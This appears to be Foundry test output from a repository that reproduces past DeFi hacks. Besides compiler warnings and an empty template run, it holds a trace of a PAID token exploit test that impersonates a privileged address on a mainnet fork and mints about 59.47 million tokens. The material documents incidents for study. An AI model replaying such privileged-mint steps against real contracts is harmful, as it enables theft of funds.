Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.15s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 495.23ms (1.82ms CPU time)

Ran 1 test for src/test/2021-03/PAID_exp.sol:ContractTest
[PASS] testExploit() (gas: 57970)
Logs:
  [End] PAID balance after exploitation:: 59471745.571000000000000000

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 11979839 [1.197e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [57970] ContractTest::testExploit()
    ├─ [0] VM::prank(0x18738290AF1Aaf96f0AcfA945C9C31aB21cd65bE)
    │   └─ ← [Return]
    ├─ [42005] 0x8c8687fC965593DFb2F0b4EAeFD55E9D8df348df::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 59471745571000000000000000 [5.947e25])
    │   ├─ [34729] 0xB828E66eB5B41B9Ada9Aa42420a6542CD095B9C7::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 59471745571000000000000000 [5.947e25]) [delegatecall]
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 59471745571000000000000000 [5.947e25])
    │   │   ├─  storage changes:
    │   │   │   @ 103: 0x000000000000000000000000000000000000000001babeb0165a1cff3d3f8000 → 0x000000000000000000000000000000000000000001ebf051dff2591b99630000
    │   │   │   @ 0xfa62042c94b1d836c3640cb5f5f4cfcf1743d5d821d23c42e21d7d19e23a11e7: 0 → 0x0000000000000000000000000000000000000000003131a1c9983c1c5c238000
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [1392] 0x8c8687fC965593DFb2F0b4EAeFD55E9D8df348df::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [616] 0xB828E66eB5B41B9Ada9Aa42420a6542CD095B9C7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 59471745571000000000000000 [5.947e25]
    │   └─ ← [Return] 59471745571000000000000000 [5.947e25]
    ├─ emit log_named_decimal_uint(key: "[End] PAID balance after exploitation:", val: 59471745571000000000000000 [5.947e25], decimals: 18)
    ├─  storage changes:
    │   @ 0xfa62042c94b1d836c3640cb5f5f4cfcf1743d5d821d23c42e21d7d19e23a11e7: 0 → 0x0000000000000000000000000000000000000000003131a1c9983c1c5c238000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.99s (1.73s CPU time)

Ran 2 test suites in 3.00s (3.49s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
